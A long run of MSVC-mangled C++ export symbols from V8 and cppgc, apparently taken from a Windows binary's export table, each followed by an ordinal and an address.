                                                                                                                                                                                                        ?GetOverloadResolution@CFunction@v8@@QEAA?AW4OverloadResolution@12@PEBV12@@Z74960x14007a200
                                                                                                                                                                                                        ?GetOwnPropertyDescriptor@JSReceiver@internal@v8@@SA?AV?$Maybe@_N@3@PEAVIsolate@23@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@PEAVPropertyDescriptor@23@@Z74970x140837a90
                                                                                                                                                                                                        ?GetOwnPropertyDescriptor@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z74980x140b170c0
                                                                                                                                                                                                        ?GetOwnPropertyNames@Object@v8@@QEAA?AV?$MaybeLocal@VArray@v8@@@2@V?$Local@VContext@v8@@@2@@Z74990x140b173f0
                                                                                                                                                                                                        ?GetOwnPropertyNames@Object@v8@@QEAA?AV?$MaybeLocal@VArray@v8@@@2@V?$Local@VContext@v8@@@2@W4PropertyFilter@2@W4KeyConversionMode@2@@Z75000x140b17430
                                                                                                                                                                                                        ?GetPCOffset@CodeCommentsIterator@internal@v8@@QEBAIXZ75010x140ab3710
                                                                                                                                                                                                        ?GetPageAllocator@DefaultPlatform@cppgc@@UEAAPEAVPageAllocator@v8@@XZ75020x140163040
                                                                                                                                                                                                        ?GetPageForSize@FreeListMany@internal@v8@@UEAAPEAVPage@23@_K@Z75030x1409cd390
                                                                                                                                                                                                        ?GetPageMemory@LargePageMemoryRegion@internal@cppgc@@QEBA?BVPageMemory@23@XZ75040x140450fd0
                                                                                                                                                                                                        ?GetPageMemory@NormalPageMemoryRegion@internal@cppgc@@QEBA?BVPageMemory@23@_K@Z75050x140451030
                                                                                                                                                                                                        ?GetParallelMove@Instruction@compiler@internal@v8@@QEAAPEAVParallelMove@234@W4GapPosition@1234@@Z75060x1404bc200
                                                                                                                                                                                                        ?GetParallelMove@Instruction@compiler@internal@v8@@QEBAPEBVParallelMove@234@W4GapPosition@1234@@Z75070x1404bc200
                                                                                                                                                                                                        ?GetParameter@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVRegister@234@H@Z75080x140913a50
                                                                                                                                                                                                        ?GetParameterCount@?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@SAHXZ75090x14007a060
                                                                                                                                                                                                        ?GetParameterCount@?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@SAHXZ75100x14007a060
                                                                                                                                                                                                        ?GetParameterCount@?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ75110x1400910b0
                                                                                                                                                                                                        ?GetParameterCount@?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ75120x14007a060
                                                                                                                                                                                                        ?GetParameterCount@?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@SAHXZ75130x1400792d0
                                                                                                                                                                                                        ?GetParameterCount@?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@SAHXZ75140x14007a0a0
                                                                                                                                                                                                        ?GetParameterCount@CallInterfaceDescriptor@internal@v8@@QEBAHXZ75150x1404bc210
                                                                                                                                                                                                        ?GetParameterCountAfterLowering@Int64Lowering@compiler@internal@v8@@SAHPEAV?$Signature@W4MachineRepresentation@internal@v8@@@34@@Z75160x140f68860
                                                                                                                                                                                                        ?GetParameterLocation@Linkage@compiler@internal@v8@@QEBA?AVLinkageLocation@234@H@Z75170x1404bc220
                                                                                                                                                                                                        ?GetParameterSecondaryLocation@Linkage@compiler@internal@v8@@QEBA?AVLinkageLocation@234@H@Z75180x140eab5a0
                                                                                                                                                                                                        ?GetParameterType@CallDescriptor@compiler@internal@v8@@QEBA?AVMachineType@34@_K@Z75190x1404bc260
                                                                                                                                                                                                        ?GetParameterType@CallInterfaceDescriptor@internal@v8@@QEBA?AVMachineType@23@H@Z75200x1404bc280
                                                                                                                                                                                                        ?GetParameterType@Linkage@compiler@internal@v8@@QEBA?AVMachineType@34@H@Z75210x1404bc2a0
                                                                                                                                                                                                        ?GetParent@CpuProfileNode@v8@@QEBAPEBV12@XZ75220x1402e3240
                                                                                                                                                                                                        ?GetPatch@Version@internal@v8@@SAHXZ75230x140529050
                                                                                                                                                                                                        ?GetPersistentRegion@StrongCrossThreadPersistentPolicy@internal@cppgc@@SAAEAVCrossThreadPersistentRegion@23@PEBX@Z75240x1404571d0
                                                                                                                                                                                                        ?GetPersistentRegion@StrongPersistentPolicy@internal@cppgc@@SAAEAVPersistentRegion@23@PEBX@Z75250x1404571f0
                                                                                                                                                                                                        ?GetPersistentRegion@WeakCrossThreadPersistentPolicy@internal@cppgc@@SAAEAVCrossThreadPersistentRegion@23@PEBX@Z75260x140457210
                                                                                                                                                                                                        ?GetPersistentRegion@WeakPersistentPolicy@internal@cppgc@@SAAEAVPersistentRegion@23@PEBX@Z75270x140457230
                                                                                                                                                                                                        ?GetPlacement@Scheduler@compiler@internal@v8@@AEAA?AW4Placement@1234@PEAVNode@234@@Z75280x141052730
                                                                                                                                                                                                        ?GetPlatformPageAllocator@internal@v8@@YAPEAVPageAllocator@2@XZ75290x1406b5940
                                                                                                                                                                                                        ?GetPoisoningMitigationLevel@OptimizedCompilationInfo@internal@v8@@QEBA?AW4PoisoningMitigationLevel@23@XZ75300x140078ae0
                                                                                                                                                                                                        ?GetPosition@WasmFunctionBuilder@wasm@internal@v8@@QEBA_KXZ75310x1405405e0
                                                                                                                                                                                                        ?GetPositionInfo@Script@internal@v8@@QEBA_NHPEAUPositionInfo@123@W4OffsetFlag@123@@Z75320x1407f96f0
                                                                                                                                                                                                        ?GetPossibleBreakpoints@Debug@internal@v8@@QEAA_NV?$Handle@VScript@internal@v8@@@23@HH_NPEAV?$vector@VBreakLocation@internal@v8@@V?$allocator@VBreakLocation@internal@v8@@@std@@@std@@@Z75330x140a61150
                                                                                                                                                                                                        ?GetPossibleBreakpoints@Script@debug@v8@@QEBA_NAEBVLocation@23@0_NPEAV?$vector@VBreakLocation@debug@v8@@V?$allocator@VBreakLocation@debug@v8@@@std@@@std@@@Z75340x140a6fef0
                                                                                                                                                                                                        ?GetPossibleBreakpoints@WasmScript@internal@v8@@SA_NPEAVNativeModule@wasm@23@AEBVLocation@debug@3@1PEAV?$vector@VBreakLocation@debug@v8@@V?$allocator@VBreakLocation@debug@v8@@@std@@@std@@@Z75350x1405619f0
                                                                                                                                                                                                        ?GetPreviousCodeStartAddress@CodeEvent@v8@@QEAA_KXZ75360x140078ed0
                                                                                                                                                                                                        ?GetPreviousEventForTesting@StatsCollector@internal@cppgc@@QEBAAEBUEvent@123@XZ75370x14044fde0
                                                                                                                                                                                                        ?GetPrivate@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VPrivate@v8@@@2@@Z75380x140b17460
                                                                                                                                                                                                        ?GetPrivateMembers@debug@v8@@YA_NV?$Local@VContext@v8@@@2@V?$Local@VObject@v8@@@2@PEAV?$vector@V?$Local@VValue@v8@@@v8@@V?$allocator@V?$Local@VValue@v8@@@v8@@@std@@@std@@2@Z75390x140a702b0
                                                                                                                                                                                                        ?GetProcedureAddressOffset@EhFrameWriter@internal@v8@@AEBAHXZ75400x1404afcb0
                                                                                                                                                                                                        ?GetProcedureSizeOffset@EhFrameWriter@internal@v8@@AEBAHXZ75410x1404afcc0
                                                                                                                                                                                                        ?GetProcessWideCodeRange@CodeRange@internal@v8@@SA?AV?$shared_ptr@VCodeRange@internal@v8@@@std@@XZ75420x1409f1e00
                                                                                                                                                                                                        ?GetProfile@CpuProfiler@internal@v8@@QEAAPEAVCpuProfile@23@H@Z75430x140761a70
                                                                                                                                                                                                        ?GetProfilesCount@CpuProfiler@internal@v8@@QEAAHXZ75440x140761b70
                                                                                                                                                                                                        ?GetPromise@Resolver@Promise@v8@@QEAA?AV?$Local@VPromise@v8@@@3@XZ75450x1404bf7a0
                                                                                                                                                                                                        ?GetPromise@WasmModuleObjectBuilderStreaming@v8@@QEAA?AV?$Local@VPromise@v8@@@2@XZ75460x140078e00
                                                                                                                                                                                                        ?GetPromiseOnStackOnThrow@Isolate@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@XZ75470x140a11f80
                                                                                                                                                                                                        ?GetProperty@Object@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVLookupIterator@23@_N@Z75480x1407f9e50
                                                                                                                                                                                                        ?GetPropertyAccessInfo@JSHeapBroker@compiler@internal@v8@@QEAA?AVMinimorphicLoadPropertyAccessInfo@234@AEBVMinimorphicLoadPropertyAccessFeedback@234@AEBUFeedbackSource@234@@Z75490x140f2efd0
                                                                                                                                                                                                        ?GetPropertyAccessInfo@JSHeapBroker@compiler@internal@v8@@QEAA?AVPropertyAccessInfo@234@VMapRef@234@VNameRef@234@W4AccessMode@234@PEAVCompilationDependencies@234@@Z75500x140f2f2f0
                                                                                                                                                                                                        ?GetPropertyAttributes@Object@v8@@QEAA?AV?$Maybe@W4PropertyAttribute@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z75510x140b17480
                                                                                                                                                                                                        ?GetPropertyCell@LookupIterator@internal@v8@@QEBA?AV?$Handle@VPropertyCell@internal@v8@@@23@XZ75520x14081c6d0
                                                                                                                                                                                                        ?GetPropertyDetails@MapRef@compiler@internal@v8@@QEBA?AVPropertyDetails@34@VInternalIndex@34@@Z75530x140e8a5c0
                                                                                                                                                                                                        ?GetPropertyKey@MapRef@compiler@internal@v8@@QEBA?AVNameRef@234@VInternalIndex@34@@Z75540x140e8a6c0
                                                                                                                                                                                                        ?GetPropertyNames@Object@v8@@QEAA?AV?$MaybeLocal@VArray@v8@@@2@V?$Local@VContext@v8@@@2@@Z75550x140b176b0
                                                                                                                                                                                                        ?GetPropertyNames@Object@v8@@QEAA?AV?$MaybeLocal@VArray@v8@@@2@V?$Local@VContext@v8@@@2@W4KeyCollectionMode@2@W4PropertyFilter@2@W4IndexFilter@2@W4KeyConversionMode@2@@Z75560x140b176f0
                                                                                                                                                                                                        ?GetPropertySequence@RegExpParser@internal@v8@@AEAAPEAVRegExpTree@23@AEBV?$ZoneVector@D@23@@Z75570x14071d640
                                                                                                                                                                                                        ?GetProtectedInstructionsData@CodeGenerator@compiler@internal@v8@@QEAA?AV?$OwnedVector@E@base@4@XZ75580x140ee8110
                                                                                                                                                                                                        ?GetPrototype@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ75590x140b17a60
                                                                                                                                                                                                        ?GetPrototypeTransition@TransitionsAccessor@internal@v8@@QEAA?AV?$Handle@VMap@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z75600x1407bc800
                                                                                                                                                                                                        ?GetPrototypeTransitions@TransitionsAccessor@internal@v8@@AEAA?AVWeakFixedArray@23@XZ75610x1407bc910
                                                                                                                                                                                                        ?GetPtrComprCage@Isolate@internal@v8@@QEAAPEAVVirtualMemoryCage@23@XZ75620x140484c40
                                                                                                                                                                                                        ?GetPtrComprCage@Isolate@internal@v8@@QEBAPEBVVirtualMemoryCage@23@XZ75630x140484c40
                                                                                                                                                                                                        ?GetPtrComprCage@IsolateAllocator@internal@v8@@QEAAPEAVVirtualMemoryCage@23@XZ75640x14007a0a0
                                                                                                                                                                                                        ?GetPtrComprCage@IsolateAllocator@internal@v8@@QEBAPEBVVirtualMemoryCage@23@XZ75650x14007a0a0
                                                                                                                                                                                                        ?GetPtrComprCageBase@IsolateAllocator@internal@v8@@QEBA_KXZ75660x14007a0a0
                                                                                                                                                                                                        ?GetPushCompatibleMoves@CodeGenerator@compiler@internal@v8@@CAXPEAVInstruction@234@V?$Flags@W4PushTypeFlag@CodeGenerator@compiler@internal@v8@@H@base@4@PEAV?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@34@@Z75670x140ee8180
                                                                                                                                                                                                        ?GetRandomMmapAddr@BoundedPageAllocator@base@v8@@UEAAPEAXXZ75680x140e68bc0
                                                                                                                                                                                                        ?GetRandomMmapAddr@OS@base@v8@@CAPEAXXZ75690x140e602e0
                                                                                                                                                                                                        ?GetRandomMmapAddr@PageAllocator@base@v8@@UEAAPEAXXZ75700x140e63630
                                                                                                                                                                                                        ?GetRandomMmapAddr@internal@v8@@YAPEAXXZ75710x1406b5960
                                                                                                                                                                                                        ?GetRange@Type@compiler@internal@v8@@QEBA?AV1234@XZ75720x140e9fde0
                                                                                                                                                                                                        ?GetRangeData@HandlerTable@internal@v8@@QEBAHH@Z75730x140a9f590
                                                                                                                                                                                                        ?GetRangeEnd@HandlerTable@internal@v8@@QEBAHH@Z75740x140a9f5b0
                                                                                                                                                                                                        ?GetRangeHandler@HandlerTable@internal@v8@@QEBAHH@Z75750x140a9f5d0
                                                                                                                                                                                                        ?GetRangePrediction@HandlerTable@internal@v8@@AEBA?AW4CatchPrediction@123@H@Z75760x140a9f5f0
                                                                                                                                                                                                        ?GetRangeStart@HandlerTable@internal@v8@@QEBAHH@Z75770x140a9f610
                                                                                                                                                                                                        ?GetRareData@ClassScope@internal@v8@@AEAAPEAURareData@123@XZ75780x1406eb810
                                                                                                                                                                                                        ?GetRareVariable@DeclarationScope@internal@v8@@AEBAPEAVVariable@23@W4RareVariable@123@@Z75790x1406eb820
                                                                                                                                                                                                        ?GetRawNameFromIdentifier@Parser@internal@v8@@AEAAPEBVAstRawString@23@PEBV423@@Z75800x140078920
                                                                                                                                                                                                        ?GetReadOnlyRoots@ReadOnlyHeap@internal@v8@@SA?AVReadOnlyRoots@23@VHeapObject@23@@Z75810x140475660
                                                                                                                                                                                                        ?GetRealNamedProperty@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z75820x140b17b20
                                                                                                                                                                                                        ?GetRealNamedPropertyAttributes@Object@v8@@QEAA?AV?$Maybe@W4PropertyAttribute@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z75830x140b17e40
                                                                                                                                                                                                        ?GetRealNamedPropertyAttributesInPrototypeChain@Object@v8@@QEAA?AV?$Maybe@W4PropertyAttribute@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z75840x140b18040
                                                                                                                                                                                                        ?GetRealNamedPropertyInPrototypeChain@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@@Z75850x140b182f0
                                                                                                                                                                                                        ?GetRealStackAddressForSlot@Stack@base@v8@@SA?AUStackSlot@123@U4123@@Z75860x140078b40
                                                                                                                                                                                                        ?GetReceiver@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVRegister@234@XZ75870x140913a80
                                                                                                                                                                                                        ?GetReceiver@LookupIterator@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@23@XZ75880x140484c50
                                                                                                                                                                                                        ?GetReceiverMap@LookupIterator@internal@v8@@AEBA?AV?$Handle@VMap@internal@v8@@@23@XZ75890x14081c760
                                                                                                                                                                                                        ?GetReceiverMode@Bytecodes@interpreter@internal@v8@@SA?AW4ConvertReceiverMode@34@W4Bytecode@234@@Z75900x140484c60
                                                                                                                                                                                                        ?GetReceiverScope@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEBAPEAVDeclarationScope@23@XZ75910x140775470
                                                                                                                                                                                                        ?GetReceiverScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ75920x140af5690
                                                                                                                                                                                                        ?GetRecentAllocationSpeedInBytesPerMs@StatsCollector@internal@cppgc@@QEBANXZ75930x140455940
                                                                                                                                                                                                        ?GetRecordWriteStub@WasmCode@wasm@internal@v8@@SA?AW4RuntimeStubId@1234@W4RememberedSetAction@34@W4SaveFPRegsMode@34@@Z75940x140484cf0
                                                                                                                                                                                                        ?GetRecoveredTrapCount@trap_handler@internal@v8@@YA_KXZ75950x140621790
                                                                                                                                                                                                        ?GetRegisterCountOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBAIH@Z75960x140913ab0
                                                                                                                                                                                                        ?GetRegisterInfo@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAPEAVRegisterInfo@1234@VRegister@234@@Z75970x1408f8410
                                                                                                                                                                                                        ?GetRegisterInfoTableIndex@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEBA_KVRegister@234@@Z75980x1408f8430
                                                                                                                                                                                                        ?GetRegisterListOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVRegisterList@234@H@Z75990x140913af0
                                                                                                                                                                                                        ?GetRegisterOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVRegister@234@H@Z76000x140913ba0
                                                                                                                                                                                                        ?GetRegisterOperandRange@BytecodeArrayIterator@interpreter@internal@v8@@QEBAHH@Z76010x140913c10
                                                                                                                                                                                                        ?GetRegisterPairOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AU?$pair@VRegister@interpreter@internal@v8@@V1234@@std@@H@Z76020x140913c70
                                                                                                                                                                                                        ?GetRegisterParameter@?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@SA?AVRegister@23@H@Z76030x140504a00
                                                                                                                                                                                                        ?GetRegisterParameter@?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@SA?AVRegister@23@H@Z76040x140504a00
                                                                                                                                                                                                        ?GetRegisterParameter@?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@SA?AVRegister@23@H@Z76050x140504a00
                                                                                                                                                                                                        ?GetRegisterParameter@?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@SA?AVRegister@23@H@Z76060x140504a00
                                                                                                                                                                                                        ?GetRegisterParameter@?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@SA?AVRegister@23@H@Z76070x140504a60
                                                                                                                                                                                                        ?GetRegisterParameter@?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@SA?AVRegister@23@H@Z76080x140504ac0
                                                                                                                                                                                                        ?GetRegisterParameter@CallInterfaceDescriptor@internal@v8@@QEBA?AVRegister@23@H@Z76090x1404bc2e0
                                                                                                                                                                                                        ?GetRegisterParameterCount@?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@SAHXZ76100x140504ae0
                                                                                                                                                                                                        ?GetRegisterParameterCount@?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@SAHXZ76110x140504ae0
                                                                                                                                                                                                        ?GetRegisterParameterCount@?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ76120x140504b80
                                                                                                                                                                                                        ?GetRegisterParameterCount@?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ76130x140504ae0
                                                                                                                                                                                                        ?GetRegisterParameterCount@?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@SAHXZ76140x140504c20
                                                                                                                                                                                                        ?GetRegisterParameterCount@?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@SAHXZ76150x140504cc0
                                                                                                                                                                                                        ?GetRegisterParameterCount@CallInterfaceDescriptor@internal@v8@@QEBAHXZ76160x140342e40
                                                                                                                                                                                                        ?GetRegisteredHeapsForTesting@HeapRegistry@internal@cppgc@@SAAEBV?$vector@PEAVHeapBase@internal@cppgc@@V?$allocator@PEAVHeapBase@internal@cppgc@@@std@@@std@@XZ76170x140456ae0
                                                                                                                                                                                                        ?GetRelativeJumpTargetOffset@BytecodeArrayIterator@interpreter@internal@v8@@QEBAHXZ76180x140913cf0
                                                                                                                                                                                                        ?GetRename@InstructionSelector@compiler@internal@v8@@AEAAHH@Z76190x140ed6170
                                                                                                                                                                                                        ?GetReplace@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z76200x140b186f0
                                                                                                                                                                                                        ?GetReplacementHigh@Int64Lowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z76210x140f688a0
                                                                                                                                                                                                        ?GetReplacementLow@Int64Lowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z76220x140f688c0
                                                                                                                                                                                                        ?GetRepresentation@InstructionSequence@compiler@internal@v8@@QEBA?AW4MachineRepresentation@34@H@Z76230x140ea9190
                                                                                                                                                                                                        ?GetRepresentationFor@RepresentationChanger@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z76240x1410a5f00
                                                                                                                                                                                                        ?GetResourceName@ScriptOrModule@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ76250x140b18700
                                                                                                                                                                                                        ?GetReturnCount@?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@SAHXZ76260x1400910b0
                                                                                                                                                                                                        ?GetReturnCount@?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@SAHXZ76270x14007a060
                                                                                                                                                                                                        ?GetReturnCount@?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ76280x14007a060
                                                                                                                                                                                                        ?GetReturnCount@?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ76290x14007a060
                                                                                                                                                                                                        ?GetReturnCount@?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@SAHXZ76300x14007a060
                                                                                                                                                                                                        ?GetReturnCount@?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@SAHXZ76310x14007a060
                                                                                                                                                                                                        ?GetReturnCount@CallInterfaceDescriptor@internal@v8@@QEBAHXZ76320x140342dd0
                                                                                                                                                                                                        ?GetReturnHandler@HandlerTable@internal@v8@@AEBAHH@Z76330x140a9f630
                                                                                                                                                                                                        ?GetReturnLocation@CallDescriptor@compiler@internal@v8@@QEBA?AVLinkageLocation@234@_K@Z76340x1404bc300
                                                                                                                                                                                                        ?GetReturnLocation@Linkage@compiler@internal@v8@@QEBA?AVLinkageLocation@234@_K@Z76350x1404bc320
                                                                                                                                                                                                        ?GetReturnOffset@HandlerTable@internal@v8@@AEBAHH@Z76360x140a9f650
                                                                                                                                                                                                        ?GetReturnSlotCount@Frame@compiler@internal@v8@@QEBAHXZ76370x140078c00
                                                                                                                                                                                                        ?GetReturnType@CallDescriptor@compiler@internal@v8@@QEBA?AVMachineType@34@_K@Z76380x1404bc340
                                                                                                                                                                                                        ?GetReturnType@CallInterfaceDescriptor@internal@v8@@QEBA?AVMachineType@23@H@Z76390x1404bc360
                                                                                                                                                                                                        ?GetReturnType@Linkage@compiler@internal@v8@@QEBA?AVMachineType@34@_K@Z76400x1404bc380
                                                                                                                                                                                                        ?GetRoot@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@XZ76410x140078d50
                                                                                                                                                                                                        ?GetRoot@LookupIterator@internal@v8@@CA?AV?$Handle@VJSReceiver@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@_K@Z76420x140484d20
                                                                                                                                                                                                        ?GetRootForNonJSReceiver@LookupIterator@internal@v8@@CA?AV?$Handle@VJSReceiver@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@_K@Z76430x14081c830
                                                                                                                                                                                                        ?GetRuntimeCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@W4FunctionId@Runtime@34@HV?$Flags@W4Property@Operator@compiler@internal@v8@@E@base@4@V?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@base@4@@Z76440x140eab660
                                                                                                                                                                                                        ?GetRuntimeIdOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AW4FunctionId@Runtime@34@H@Z76450x140913850
                                                                                                                                                                                                        ?GetRuntimeStubId@NativeModule@wasm@internal@v8@@QEBA?AW4RuntimeStubId@WasmCode@234@_K@Z76460x14056bc90
                                                                                                                                                                                                        ?GetSFIFromEntry@OSROptimizedCodeCache@internal@v8@@AEAA?AVSharedFunctionInfo@23@H@Z76470x1407dfe60
                                                                                                                                                                                                        ?GetSONAME@Version@internal@v8@@SAXV?$Vector@D@base@3@@Z76480x1406b2ff0
                                                                                                                                                                                                        ?GetSafepointTableOffset@CodeGenerator@compiler@internal@v8@@QEBA_KXZ76490x1404fef80
                                                                                                                                                                                                        ?GetSample@CpuProfile@v8@@QEBAPEBVCpuProfileNode@2@H@Z76500x140b187a0
                                                                                                                                                                                                        ?GetSampleTimestamp@CpuProfile@v8@@QEBA_JH@Z76510x140b187c0
                                                                                                                                                                                                        ?GetSamplesCount@CpuProfile@v8@@QEBAHXZ76520x14081c570
                                                                                                                                                                                                        ?GetScopeName@StatsCollector@internal@cppgc@@CAPEBDW4ConcurrentScopeId@123@W4CollectionType@MarkingConfig@MarkerBase@23@@Z76530x14044fdf0
                                                                                                                                                                                                        ?GetScopeName@StatsCollector@internal@cppgc@@CAPEBDW4ScopeId@123@W4CollectionType@MarkingConfig@MarkerBase@23@@Z76540x14044fe50
                                                                                                                                                                                                        ?GetScript@BackgroundCompileTask@internal@v8@@QEAA?AV?$Handle@VScript@internal@v8@@@23@PEAVIsolate@23@@Z76550x140aac460
                                                                                                                                                                                                        ?GetScript@ScriptData@Coverage@debug@v8@@QEBA?AV?$Local@VScript@debug@v8@@@4@XZ76560x140a70a00
                                                                                                                                                                                                        ?GetScript@ScriptData@TypeProfile@debug@v8@@QEBA?AV?$Local@VScript@debug@v8@@@4@XZ76570x140a70a00
                                                                                                                                                                                                        ?GetScriptColumn@CodeEvent@v8@@QEAAHXZ76580x140335900
                                                                                                                                                                                                        ?GetScriptColumnNumber@Function@v8@@QEBAHXZ76590x140b18800
                                                                                                                                                                                                        ?GetScriptData@Coverage@debug@v8@@QEBA?AVScriptData@123@_K@Z76600x140a70a10
                                                                                                                                                                                                        ?GetScriptData@TypeProfile@debug@v8@@QEBA?AVScriptData@123@_K@Z76610x140a70a10
                                                                                                                                                                                                        ?GetScriptId@CpuProfileNode@v8@@QEBAHXZ76620x140b18920
                                                                                                                                                                                                        ?GetScriptId@StackFrame@v8@@QEBAHXZ76630x140b18930
                                                                                                                                                                                                        ?GetScriptLine@CodeEvent@v8@@QEAAHXZ76640x1403b2bd0
                                                                                                                                                                                                        ?GetScriptLineNumber@Function@v8@@QEBAHXZ76650x140b18950
                                                                                                                                                                                                        ?GetScriptName@CodeEvent@v8@@QEAA?AV?$Local@VString@v8@@@2@XZ76660x140493670
                                                                                                                                                                                                        ?GetScriptName@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ76670x140b18a70
                                                                                                                                                                                                        ?GetScriptName@UnboundScript@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ76680x140b18b30
                                                                                                                                                                                                        ?GetScriptNameOrSourceURL@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ76690x140b18c50
                                                                                                                                                                                                        ?GetScriptOrigin@Function@v8@@QEBA?AVScriptOrigin@2@XZ76700x140b18d10
                                                                                                                                                                                                        ?GetScriptOrigin@Message@v8@@QEBA?AVScriptOrigin@2@XZ76710x140b18e70
                                                                                                                                                                                                        ?GetScriptResourceName@CpuProfileNode@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ76720x140b190a0
                                                                                                                                                                                                        ?GetScriptResourceName@Message@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ76730x140b19100
                                                                                                                                                                                                        ?GetScriptResourceNameStr@CpuProfileNode@v8@@QEBAPEBDXZ76740x140b19130
                                                                                                                                                                                                        ?GetScriptScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ76750x140af56b0
                                                                                                                                                                                                        ?GetScriptSource@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ76760x140b19140
                                                                                                                                                                                                        ?GetScriptSourceMappingURL@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ76770x140b19200
                                                                                                                                                                                                        ?GetSearch@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z76780x140b192c0
                                                                                                                                                                                                        ?GetSecurityToken@Context@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ76790x140b192d0
                                                                                                                                                                                                        ?GetSentinelSegmentAddress@SegmentBase@internal@base@heap@@SAPEAV1234@XZ76800x14046a4b0
                                                                                                                                                                                                        ?GetSerializedNativeModuleSize@WasmSerializer@wasm@internal@v8@@QEBA_KXZ76810x140529060
                                                                                                                                                                                                        ?GetShallowSize@HeapGraphNode@v8@@QEBA_KXZ76820x140b19450
                                                                                                                                                                                                        ?GetSharedArrayBufferFromId@Delegate@ValueDeserializer@v8@@UEAA?AV?$MaybeLocal@VSharedArrayBuffer@v8@@@3@PEAVIsolate@3@I@Z76830x140b19470
                                                                                                                                                                                                        ?GetSharedArrayBufferId@Delegate@ValueSerializer@v8@@UEAA?AV?$Maybe@I@3@PEAVIsolate@3@V?$Local@VSharedArrayBuffer@v8@@@3@@Z76840x140b19530
